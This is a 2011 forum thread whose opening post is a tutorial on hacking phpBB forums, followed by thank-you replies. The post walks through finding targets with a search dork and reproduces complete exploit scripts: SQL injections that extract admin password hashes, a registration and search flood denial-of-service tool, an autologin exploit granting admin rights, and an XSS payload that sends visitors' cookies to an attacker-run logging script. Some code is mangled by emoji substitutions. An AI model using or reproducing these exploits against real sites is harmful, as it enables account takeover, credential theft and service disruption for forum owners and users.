THREAD: How to hack phpbb2 forums
  1. 04-08-2011, 08:44 PM
    Curt's Avatar
    Curt
    Former Staff
    Curt's Avatar
    Curt
    Former Staff
    2,437
    Posts
    24,200
    Reputation
    Oct 2009
    NextGenUpdate
    Before you guys say I copied this from another forum I didn't I made this about 4month ago on another site I'm a super mod on. Proof - You must login or register to view this content.

    Ok so...in this little tutorial I will present you how to hack a phpBB v2.x or v3.x and the best exploits,utils etc.. for this :

    Here's the download links, I thought i'd post them for you.
    For 32bit user's click You must login or register to view this content.
    For 64bit user's click You must login or register to view this content.

    1st if you don't know how to use these exploits you need to download active perl heres a video tut how to use these.


    1. Search for phpBB Forums

    First we have to search a phpBB forum.For this go to You must login or register to view this content. and type "Powered by phpBB"(This is called a Dork).It will result in big ammount of phpBB forums.Chose One and enter.

    2. Find out what version its

    The second step is to find what version of phpBB is that forum.For that we will use [url]www.site.com/forum/docs/CHANGELOG.html[/url] link,
    where site its the site name.Ex : You must login or register to view this content.

    3. Finding good exploits

    Now that we know the forum version we go to You must login or register to view this content. and search for phpBB v2 or v3 depending on what the forum version is. Here i'll give you some good exploits that if found :

    1. phpBB Remote Exploit 2.0.x

    #!/usr/bin/perl -w
    use IO::Socket;


    ## PROOF-OF-CONCEPT
    ## * работает только с mysql v>4.0
    ## * работает только если на форуме не удалено самое первое сообщение
    ##
    ## Example:
    ## C:\>r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2
    ## [~] prepare to connect...
    ## [+] connected
    ## [~] prepare to send data...
    ## [+] OK
    ## [~] wait for response...
    ## [+] MD5 Hash for user with id=2 is: 5f4dcc3b5aa765d61d8327deb882cf99
    ##


    if (@ARGV < 4)
    {
    print "\n\n";
    print "|************************************************* ***************|\n";
    print " r57phpbb.pl\n";
    print " phpBB v<=2.06 search_id sql injection exploit (POC version)\n";
    print " by RusH security team // www.rsteam.ru , https://rst.void.ru\n";
    print " coded by f3sy1 & 1dt.w0lf // 16/12/2003\n";
    print " Usage: r57phpbb-poc.pl <server> <folder> <user_id> <search_id>\n";
    print " e.g.: r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2\n";
    print " [~] <server> - server ip\n";
    print " [~] <folder> - forum folder\n";
    print " [~] <user_id> - user id (2 default for phpBB admin)\n";
    print " [~] <search_id> - play with this value for results\n";
    print "|************************************************* ***************|\n";
    print "\n\n";
    exit(1);
    }

    $success = 0;
    $server = $ARGV[0];
    $folder = $ARGV[1];
    $user_id = $ARGV[2];
    $search_id = $ARGV[3];
    print "[~] prepare to connect...\n";
    $socket = IO::Socket::INET->new(
    Proto => "tcp",
    PeerAddr => "$server",
    PeerPort => "80") || die "$socket error $!";
    print "[+] connected\n";
    print "[~] prepare to send data...\n";
    # PROOF-OF-CONCEPT reguest...
    print $socket "GET /$folder/search.php?search_id=$search_id%20union%20select%2 0concat(char(97,58,55,58,123,115,58,49,52,58,34,11 5,101,97,114,99,104,95,114,101,115,117,
    108,116,115,34,59,115,58,49,58,34,49,34,59,115,58, 49,55,58,34,116,111,116,97,108
    ,
    95,109,97,116,99,104,95,99,111,117,110,116,34,59,1 05,58,53,59,115,58,49,50,58,34
    ,
    115,112,108,105,116,95,115,101,97,114,99,104,34,59 ,97,58,49,58,123,105,58,48,59,
    1
    15,58,51,50,58,34),user_password,char(34,59,125,11 5,58,55,58,34,115,111,114,116,95,98,121,34,59,105, 58,48,59,115,5
    8,56,58,34,115,111,114,116,95,100,105,114,34,59,11 5,58,52,58,34,68,69,83,67,34,5
    9
    ,115,58,49,50,58,34,115,104,111,119,95,114,101,115 ,117,108,116,115,34,59,115,58,
    5
    4,58,34,116,111,112,105,99,115,34,59,115,58,49,50, 58,34,114,101,116,117,114,110,
    9
    5,99,104,97,114,115,34,59,105,58,50,48,48,59,125)) %20from%20phpbb_users%20where%20user_id=$user_id/* HTTP/1.0

    ";
    print "[+] OK\n";
    print "[~] wait for response...\n";
    while ($answer = <$socket>Winky Winky
    {
    if ($answer =~ /;highlight=/)
    {
    $success = 1;
    @result=split(/;/,$answer);
    @result2=split(/=/,$result[1]);
    $result2[1]=~s/&/ /g;
    print "[+] MD5 Hash for user with id=$user_id is: $result2[1]\n";
    }
    }
    if ($success==0) {print "[-] exploit failed =(\n";}

    ## o---[ RusH security team | www.rsteam.ru | 2003 ]---o


    2. phpBB 2.0.19 DOS Vulnerability

    #!/usr/bin/perl 
    #######################################
    ##********* *********Recoded by: mix2mix and Elioni of https://ahg-khf.org##********* *********And h4cky0u Security Forums (https://h4cky0u.org)
    ##********* *********Name: phpBBDoSReloaded
    ##********* *********Original Author: HaCkZaTaN of Neo Security Team
    ##********* *********Tested on phpBB 2.0.19 and earlier versions
    ##********* *********Ported to perl by g30rg3_x
    ##********* *********Date: 25/01/06
    #######################################
    use IO::Socket;

    ## Initialized X
    $x = 0;

    print q(
    ********* phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN
    ********* Recoded by Albanian Hackers Group &
    ********* h4cky0u Security Forums

    );
    print q(Host |without-> https://www.| );
    $host = <STDIN>;
    chop ($host);

    print q(Path |example-> /phpBB2/ or /| );
    $pth = <STDIN>;
    chop ($pth);

    print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If Visual Confirmation is enabled| );
    $type = <STDIN>;
    chop ($type);

    ## Tipi p*********r regjistrim
    if($type == 1){

    ## User Loop for 9999 loops (enough for Flood xDDDD)
    while($x != 9999)
    {

    ## Antari q********* regjistrohet automatikisht********* "X"
    $uname = "username=AHG__" . "$x";

    ## Emaili q********* regjistrohet ne baz*********n "X"
    $umail = "&email=AHG__" . "$x";

    $postit = "$uname"."$umail"."%40ahg-crew.org&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";

    $lrg = length $postit;

    my $sock = new IO::Socket::INET (
    ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* *********PeerAddr => "$host",
    ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* *********PeerPort => "80",
    ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* *********Proto => "tcp",
    ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* );
    die "\nNuk mundem te lidhemi me hostin sepse *********sht dosirat ose nuk egziston: $!\n" unless $sock;

    ## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums
    print $sock "POST $pth"."profile.php HTTP/1.1\n";
    print $sock "Host: $host\n";
    print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
    print $sock "Referer: $host\n";
    print $sock "Accept-Language: en-us\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\n";
    print $sock "Accept-Encoding: gzip, deflate\n";
    print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.Cool Man (aka Tustin) Gecko/20050511 Firefox/1.0.4\n";
    print $sock "Connection: Keep-Alive\n";
    print $sock "Cache-Control: no-cache\n";
    print $sock "Content-Length: $lrg\n\n";
    print $sock "$postit\n";
    close($sock);

    ## Print a "+" for every loop
    syswrite STDOUT, "+";

    $x++;
    }

    ## Tipi 2-sh********* p*********r K*********rkim(Flood)
    }
    elsif ($type == 2){

    while($x != 9999)
    {
    ## Final Search String to Send
    $postit = "search_keywords=Albanian+Hackers+Group+Proof+of+Co ncept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";

    ## Posit Length
    $lrg = length $postit;

    ## Connect Socket with Variables Provided By User
    my $sock = new IO::Socket::INET (
    ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* *********PeerAddr => "$host",
    ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* *********PeerPort => "80",
    ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* *********Proto => "tcp",
    ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* ********* );
    die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;

    ## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums
    print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n";
    print $sock "Host: $host\n";
    print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
    print $sock "Referer: $host\n";
    print $sock "Accept-Language: en-us\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\n";
    print $sock "Accept-Encoding: gzip, deflate\n";
    print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.Cool Man (aka Tustin) Gecko/20050511 Firefox/1.0.4\n";
    print $sock "Connection: Keep-Alive\n";
    print $sock "Cache-Control: no-cache\n";
    print $sock "Content-Length: $lrg\n\n";
    print $sock "$postit\n";
    close($sock);

    ## Print a "+" for every loop
    syswrite STDOUT, "+";

    ## Increment X in One for every Loop
    $x++;
    }
    }else{
    ## STF??? Qfar********* keni Shtypur
    ********* *********die "Mund*********sia nuk Lejohet +_-???\n";
    }



    1. phpBB 3 Remote SQL Injection Exploit

    #!/usr/bin/php -q -d short_open_tag=on
    <?
    echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n";
    echo "by rgod rgod@autistici.org\n";
    echo "site: https://retrogod.altervista.org\n";
    echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB Group\"\n\n";

    /*
    works regardless of php.ini settings
    you need a global moderator account with "simple moderator" role
    */

    if ($argc<5) {
    echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n";
    echo "host:********* ********* ********* target server (ip/hostname)\n";
    echo "path:********* ********* ********* path to phpbb3\n";
    echo "user/pass: u need a valid user account with global moderator rights\n";
    echo "Options:\n";
    echo "********* *********-T[prefix]********* *********specify a table prefix different from default (phpbb_)\n";
    echo "********* *********-p[port]:********* ********* specify a port other than 80\n";
    echo "********* *********-P[ip:port]: specify a proxy\n";
    echo "********* *********-u[number]:********* specify a user id other than 2 (admin)\n";
    echo "********* *********-x:********* ********* ********* ********* ********* disclose table prefix through error messages\n";
    echo "Example:
    ";
    echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u
    ";
    echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n";
    die;
    }

    error_reporting(0);
    ini_set("max_execution_time",0);
    ini_set("default_socket_timeout",5);

    function quick_dump($string)
    {
    ********* $result='';$exa='';$cont=0;
    ********* for ($i=0; $i<=strlen($string)-1; $i++)
    ********* {
    ********* *********if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
    ********* *********{$result.="********* .";}
    ********* *********else
    ********* *********{$result.="********* ".$string[$i];}
    ********* *********if (strlen(dechex(ord($string[$i])))==2)
    ********* *********{$exa.=" ".dechex(ord($string[$i]));}
    ********* *********else
    ********* *********{$exa.=" 0".dechex(ord($string[$i]));}
    ********* *********$cont++;if ($cont==15) {$cont=0; $result.="
    "; $exa.="
    ";}
    ********* }
    return $exa."
    ".$result;
    }
    $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b) ';
    function sendpacketii($packet)
    {
    ********* global $proxy, $host, $port, $html, $proxy_regex;
    ********* if ($proxy==''Winky Winky {
    ********* ********* $ock=fsockopen(gethostbyname($host),$port);
    ********* ********* if (!$ock) {
    ********* ********* ********* echo 'No response from '.$host.':'.$port; die;
    ********* ********* }
    ********* }
    ********* else {
    ********* *********$c = preg_match($proxy_regex,$proxy);
    ********* ********* if (!$c) {
    ********* ********* ********* echo 'Not a valid proxy...';die;
    ********* ********* }
    ********* ********* $parts=explode(':',$proxy);
    ********* ********* echo "Connecting to ".$parts[0].":".$parts[1]." proxy...
    ";
    ********* ********* $ock=fsockopen($parts[0],$parts[1]);
    ********* ********* if (!$ock) {
    ********* ********* ********* echo 'No response from proxy...';die;
    ********* *********}
    ********* }
    ********* fputs($ock,$packet);
    ********* if ($proxy==''Winky Winky {
    ********* ********* $html='';
    ********* ********* while (!feof($ock)) {
    ********* ********* ********* $html.=fgets($ock);
    ********* ********* }
    ********* }
    ********* else {
    ********* ********* $html='';
    ********* ********* while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) {
    ********* ********* ********* $html.=fread($ock,1);
    ********* ********* }
    ********* }
    ********* fclose($ock);
    ********* #debug
    ********* #echo "
    ".$html;
    }

    $host=$argv[1];
    $path=$argv[2];
    $user=$argv[3];
    $pass=$argv[4];
    $port=80;
    $prefix="PHPBB_";
    $user_id="2";//admin
    $discl=0;
    $proxy="";
    for ($i=3; $i<=$argc-1; $i++){
    $temp=$argv[$i][0].$argv[$i][1];
    if ($temp=="-p")
    {
    ********* $port=str_replace("-p","",$argv[$i]);
    }
    if ($temp=="-P")
    {
    ********* $proxy=str_replace("-P","",$argv[$i]);
    }
    if ($temp=="-T")
    {
    ********* $prefix=str_replace("-T","",$argv[$i]);
    }
    if ($temp=="-u")
    {
    ********* $user_id=str_replace("-u","",$argv[$i]);
    }
    if ($temp=="-x")
    {
    ********* $discl=1;
    }
    }

    if (($path[0]<>'/'Winky Winky or ($path[strlen($path)-1]<>'/'Winky Winky) {echo 'Error... check the path!'; die;}
    if ($proxy==''Winky Winky {$p=$path;} else {$p='https://'.$host.':'.$port.$path;}

    $data="username=".urlencode($user);
    $data.="&password=".urlencode($pass);
    $data.="&redirect=index.php";
    $data.="&login=Login";
    $packet="POST ".$p."ucp.php?mode=login HTTP/1.0
    ";
    $packet.="Referer: https://$host$path/ucp.php?mode=login
    ";
    $packet.="Content-Type: application/x-www-form-urlencoded
    ";
    $packet.="Accept-Encoding: text/plain
    ";
    $packet.="Host: ".$host."
    ";
    $packet.="Content-Length: ".strlen($data)."
    ";
    $packet.="Connection: Close

    ";
    $packet.=$data;
    sendpacketii($packet);
    $cookie="";
    $temp=explode("Set-Cookie: ",$html);
    for ($i=1; $i<=count($temp)-1; $i++)
    {
    $temp2=explode(" ",$temp[$i]);
    $cookie.=" ".$temp2[0];
    }
    if (eregi("_u=1;",$cookie))
    {
    //echo $html."\n";//debug
    //die("Unable to login...");
    }
    echo "cookie -> ".$cookie."
    ";
    if ($discl)
    {
    $sql="'suntzuuuuu";
    echo "sql -> ".$sql."\n";
    $sql=urlencode(strtoupper($sql));
    $data="username=";
    $data.="&icq=";
    $data.="&email=";
    $data.="&aim=";
    $data.="&joined_select=lt";
    $data.="&joined=";
    $data.="&yahoo=";
    $data.="&active_select=lt";
    $data.="&active=";
    $data.="&msn=";
    $data.="&count_select=eq";
    $data.="&count=";
    $data.="&jabber=";
    $data.="&sk=c";
    $data.="&sd=a";
    $data.="&ip=".$sql;
    $data.="&search_group_id=0";
    $data.="&submit=Search";
    $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0
    ";
    $packet.="Content-Type: application/x-www-form-urlencoded
    ";
    $packet.="Host: ".$host."
    ";
    $packet.="Content-Length: ".strlen($data)."
    ";
    $packet.="Connection: Close
    ";
    $packet.="Cookie: ".$cookie."

    ";
    $packet.=$data;
    sendpacketii($packet);
    if (strstr($html,"You have an error in your SQL syntax"))
    {
    $temp=explode("posts",$html);
    $temp2=explode(" ",$temp[0]);
    $prefix=strtoupper($temp2[count($temp2)-1]);
    echo "prefix -> ".$prefix."\n";sleep(2);
    }
    }

    $md5s[0]=0;//null
    $md5s=array_merge($md5s,range(48,57)); //numbers
    $md5s=array_merge($md5s,range(97,102));//a-f letters
    //print_r(array_values($md5s));
    $j=1;$password="";
    while (!strstr($password,chr(0)))
    {
    for ($i=0; $i<=255; $i++)
    {
    if (in_array($i,$md5s))
    {
    ********* $sql="1.1.1.999'Winky Winky UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
    ********* echo "sql -> ".$sql."\n";
    ********* $sql=urlencode(strtoupper($sql));
    ********* $data="username=";
    ********* $data.="&icq=";
    ********* $data.="&email=";
    ********* $data.="&aim=";
    ********* $data.="&joined_select=lt";
    ********* $data.="&joined=";
    ********* $data.="&yahoo=";
    ********* $data.="&active_select=lt";
    ********* $data.="&active=";
    ********* $data.="&msn=";
    ********* $data.="&count_select=eq";
    ********* $data.="&count=";
    ********* $data.="&jabber=";
    ********* $data.="&sk=c";
    ********* $data.="&sd=a";
    ********* $data.="&ip=".$sql;
    ********* $data.="&search_group_id=0";
    ********* $data.="&submit=Search";
    ********* $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0
    ";
    ********* $packet.="Content-Type: application/x-www-form-urlencoded
    ";
    ********* $packet.="Host: ".$host."
    ";
    ********* $packet.="Content-Length: ".strlen($data)."
    ";
    ********* $packet.="Connection: Close
    ";
    ********* $packet.="Cookie: ".$cookie."

    ";
    ********* $packet.=$data;
    ********* sendpacketii($packet);
    ********* if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]
    ";sleep(2);break;}
    ********* }
    ********* if ($i==255) {die("Exploit failed...");}
    }
    $j++;
    }

    $j=1;$admin="";
    while (!strstr($admin,chr(0)))
    {
    for ($i=0; $i<=255; $i++)
    {
    ********* $sql="1.1.1.999'Winky Winky UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
    ********* echo "sql -> ".$sql."\n";
    ********* $sql=urlencode(strtoupper($sql));
    ********* $data="username=";
    ********* $data.="&icq=";
    ********* $data.="&email=";
    ********* $data.="&aim=";
    ********* $data.="&joined_select=lt";
    ********* $data.="&joined=";
    ********* $data.="&yahoo=";
    ********* $data.="&active_select=lt";
    ********* $data.="&active=";
    ********* $data.="&msn=";
    ********* $data.="&count_select=eq";
    ********* $data.="&count=";
    ********* $data.="&jabber=";
    ********* $data.="&sk=c";
    ********* $data.="&sd=a";
    ********* $data.="&ip=".$sql;
    ********* $data.="&search_group_id=0";
    ********* $data.="&submit=Search";
    ********* $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0
    ";
    ********* $packet.="Content-Type: application/x-www-form-urlencoded
    ";
    ********* $packet.="Host: ".$host."
    ";
    ********* $packet.="Content-Length: ".strlen($data)."
    ";
    ********* $packet.="Connection: Close
    ";
    ********* $packet.="Cookie: ".$cookie."

    ";
    ********* $packet.=$data;
    ********* sendpacketii($packet);
    ********* if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]
    ";sleep(2);break;}
    ********* }
    ********* if ($i==255) {die("Exploit failed...");}
    $j++;
    }
    echo "--------------------------------------------------------------------
    ";
    echo "admin********* ********* ********* ********* ********* -> ".$admin."
    ";
    echo "password (md5) -> ".$password."
    ";
    echo "--------------------------------------------------------------------
    ";

    function is_hash($hash)
    {
    if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
    else {return false;}
    }

    if (is_hash($password)) {echo "Exploit succeeded...";}
    else {echo "Exploit failed...";}
    ?>



    2. Xss phpBB 3.0


    Open a text editor such as "notebook"

    Enter the following script********* *********

    <script> document.location.replace ( 'https://WWW.SITOWEB/FILE.php?c=' + document.cookie); </ script>

    Save the file in img.gif (. GIF)

    When you are posting, Vai down on "Attachment uploading"

    Show your image.

    Now at the bottom are "Posted attachments" and under it your image inserted eg ciao.gif

    Now take the direct link of img. Eg:

    https://sito_web/phpBB3/files/2_bef6678eecdd2b36db36dd7ed1544ecd.gif
    Now just have to disguise the link

    Example:

    [url = https://sito_web/phpBB3/files/2_bef6678eecdd2b36db36dd7ed1544ecd.gif] Bella girl[/url]

    Now all those who use Internet Explorer as your browser, and visit your link ...
    Get their cookies.

    Log cookies (File.php)

    $ Ip = $ _SERVER [ 'REMOTE_ADDR'];
    $ UserAgent = $ _SERVER [ 'HTTP_USER_AGENT'];
    $Accept $ = $ _SERVER [ 'HTTP_ACCEPT_LANGUAGE'];
    $Cookie = $ _GET [ 'c'];
    $Myemail = "YOUR E-MAIL;
    $Date = today ( "l, j F, Y, g: ia");
    $Subject = "Xss phpBB 3";
    $Message = "Xss phpBB 3 () 2006
    Ip: $ ip
    Cookies: $ cookies
    Browser: $ userAgent
    Language: $ accept
    URL: Basic $
    Day & Time: $ today \ n";
    $ From = "From: $ myemail \ r \ n";
    Mail ($ myemail, $ subject, $ message, $ from);
    ?>

    **************************************
    Change: $ myemail = "YOUR E-MAIL;

    Eg: [email]tua@mail.com[/email]
    **************************************

    Log cookies Alternative (File.php)

    $ Cookie = $ _GET [ 'c'];
    $ Ip = getenv ( 'REMOTE_ADDR'Winky Winky;
    $ Date = date ( "j F, Y, g: ia");
    $ Referer = getenv ( 'HTTP_REFERER'Winky Winky;
    $ Fp = fopen ( 'file.txt', 'a'Winky Winky;
    Fwrite ($ fp, 'Cookie:'. $ Cookies. '<br> IP:'. $ Ip. '<br> Date and Time:'. $ Date. '<br> Referer:'. $ Referer. '< br> <br> <br> 'Winky Winky;
    Fclose ($ fp);


    Ok, I wasn't too sure on releasing this perl script because it's very accurate and works 90% of the time in getting you admin rights. But like I said it's for educational purposes only. Code below, please don't make me regret this.

    #!/usr/bin/perl -w

    # phpBB <=2.0.12 session autologin exploit
    # This script uses the vulerability in autologinid variable
    # Just gives an user on vulnerable forum administrator rights.
    # You should register the user before using this..
    # Moded and fixed by Puri

    if (@ARGV < 3)
    {
    print q(
    #-----------------------------------------------------------#
    # phpBB2 Exploit (Admin Rights)- Moded and Fixed by Puri #
    #-----------------------------------------------------------#
    # Usage: [website] [folder] [username] [proxy] #
    #-----------------------------------------------------------#
    #-----------------------------------------------------------#
    # Normal #
    #-----------------------------------------------------------#
    # Example 1: phpbb2.pl www.site.com / Puri #
    # Example 2: phpbb2.pl www.site.com /forum/ Puri #
    # Example 3: phpbb2.pl www.site.com /board/ Puri #
    # Example 4: phpbb2.pl www.site.com /phpbb/ Puri #
    # Example 5: phpbb2.pl www.site.com /phpbb2/ Puri #
    #-----------------------------------------------------------#
    # With Proxy #
    #-----------------------------------------------------------#
    # Proxy 1: phpbb2.pl www.site.com / Puri 127.0.0.1:80 #
    # Proxy 2: phpbb2.pl www.site.com /forum/ Puri 127.0.0.1:80 #
    #-----------------------------------------------------------#
    );
    exit;
    }
    use strict;
    use LWP::UserAgent;

    my $host = $ARGV[0];
    my $path = $ARGV[1];
    my $user = $ARGV[2];
    my $proxy = $ARGV[3];
    my $request = "https://";$request .= $host;
    $request .= $path;


    use HTTP::Cookies;
    my $browser = LWP::UserAgent->new ();
    my $cookie_jar = HTTP::Cookies->new( );
    $browser->cookie_jar( $cookie_jar );
    $cookie_jar->set_cookie( "0", "phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A". "%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/", $host, , , , ,);
    if ( defined $proxy) {
    $proxy =~ s/(http:\/\/)//eg;
    $browser->proxy("http" , "https://$proxy");
    }
    print "++++++++++++++++++++++++++++++++++++\n";
    print "Connect to $host$path"; if ($proxy) {print "using proxy $proxy";}

    my $response = $browser->get($request);
    die "Error: ", $response->status_line
    unless $response->is_success;

    if($response->content =~ m/phpbbprivmsg/) {
    print "\n Forum is easy to hack, lets do it!\n";
    } else {
    print "Sorry... cant hack this site."; exit();}

    print "\nGet $user ID\n";
    $response->content =~ /sid=([\w\d]*)/;
    my $sid = $1;

    $request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";
    $response = $browser->post(
    $request,
    [
    'username' => $user,
    'mode' => 'edit',
    'mode' => 'user',
    'submituser' => 'Look+up+User'
    ],
    );
    die "Error: ", $response->status_line
    unless $response->is_success;

    if ($response->content =~ /name="u" value="([\d]*)"/)
    {print " Done... ID=$1\n\n";}
    else {print "No user $user found..."; exit(); }
    my $uid = $1;
    print "Will give $user admin rights\n";

    $response = $browser->post(
    $request,
    [
    'userlevel' => 'admin',
    'mode' => 'user',
    'adv'=>'',
    'u'=> $uid,
    'submit'=> 'Submit'
    ],
    );
    die "Error: ", $response->status_line
    unless $response->is_success;
    print " Done! $user have admin rights now!\n";


    Hope My Little Tutorial Helped You, it sure helped me, please don't abuse this.


    -Curt
    Last edited by Curt ; 04-14-2011 at 03:24 PM. Reason: Adding a new perl.

  2. The Following 22 Users Say Thank You to Curt For This Useful Post:

    , , , , , , , , , , , , , , , , , , , ,

  3. 04-08-2011, 08:47 PM
    Acerman's Avatar
    Acerman
    Gym leader
    Acerman's Avatar
    Acerman
    Gym leader
    298
    Posts
    483
    Reputation
    Mar 2011
    NextGenUpdate
    I can vouch that he didnt copy and paste Winky Winky
  4. 04-08-2011, 08:47 PM
    spf357's Avatar
    spf357
    Do a barrel roll!
    spf357's Avatar
    spf357
    Do a barrel roll!
    138
    Posts
    274
    Reputation
    Dec 2009
    NextGenUpdate
    Curt, you supply us with the best tutorials around here.
  5. 04-08-2011, 08:48 PM
    519
    Posts
    2,545
    Reputation
    Aug 2010
    NextGenUpdate
    VM me for +rep tomorrow, I'm all out.
  6. 04-08-2011, 08:54 PM
    Curt's Avatar
    Curt
    Former Staff
    Curt's Avatar
    Curt
    Former Staff
    2,437
    Posts
    24,200
    Reputation
    Oct 2009
    NextGenUpdate
    Originally Posted by spf357 View Post
    Curt, you supply us with the best tutorials around here.


    I'm just trying to help lol, thanks Winky Winky

    ---------- Post added at 09:54 PM ---------- Previous post was at 09:53 PM ----------

    Originally Posted by MikeOxBig View Post
    VM me for +rep tomorrow, I'm all out.


    Na, I'm not bothered about rep lol, just trying to share my knowledge :y:
  7. 04-09-2011, 01:03 AM
    Sigma's Avatar
    Sigma
    VAMP
    Sigma's Avatar
    Sigma
    VAMP
    2,558
    Posts
    6,983
    Reputation
    Jan 2011
    NextGenUpdate
    Thanks for the tut bro.
  8. 04-09-2011, 01:41 AM
    Kylee.'s Avatar
    Kylee.
    Banned
    Kylee.'s Avatar
    Kylee.
    Banned
    2,159
    Posts
    6,063
    Reputation
    Aug 2010
    NextGenUpdate
    what you doing on another site anyway:( i know what your doing!
    your getting stuff from here then leaking it there :(
  9. 04-09-2011, 01:54 AM
    Curt's Avatar
    Curt
    Former Staff
    Curt's Avatar
    Curt
    Former Staff
    2,437
    Posts
    24,200
    Reputation
    Oct 2009
    NextGenUpdate
    Originally Posted by MomasGirlOnline View Post
    what you doing on another site anyway:( i know what your doing!
    your getting stuff from here then leaking it there :(


    LOL! MGO you know me too well Eek , jokes. I've been on that site since like September haha and I'm a super mod so yeah....I just decided to post it here aswell cos I was going through my threads the other day, I thought it would of been posted here before but I guess not :rolleyes:. So that's why I posted it =D
  10. 04-09-2011, 02:00 AM
    Kylee.'s Avatar
    Kylee.
    Banned
    Kylee.'s Avatar
    Kylee.
    Banned
    2,159
    Posts
    6,063
    Reputation
    Aug 2010
    NextGenUpdate
    Originally Posted by Curt View Post
    LOL! MGO you know me too well Eek , jokes. I've been on that site since like September haha and I'm a super mod so yeah....I just decided to post it here aswell cos I was going through my threads the other day, I thought it would of been posted here before but I guess not :rolleyes:. So that's why I posted it =D


    Cheating on us with another site :cry: not on Curt Winky Winky
  11. 04-09-2011, 02:06 AM
    Curt's Avatar
    Curt
    Former Staff
    Curt's Avatar
    Curt
    Former Staff
    2,437
    Posts
    24,200
    Reputation
    Oct 2009
    NextGenUpdate
    Originally Posted by MomasGirlOnline View Post
    Cheating on us with another site :cry: not on Curt Winky Winky


    I replied to this somewhere else, you'll know where once the time comes Winky Winky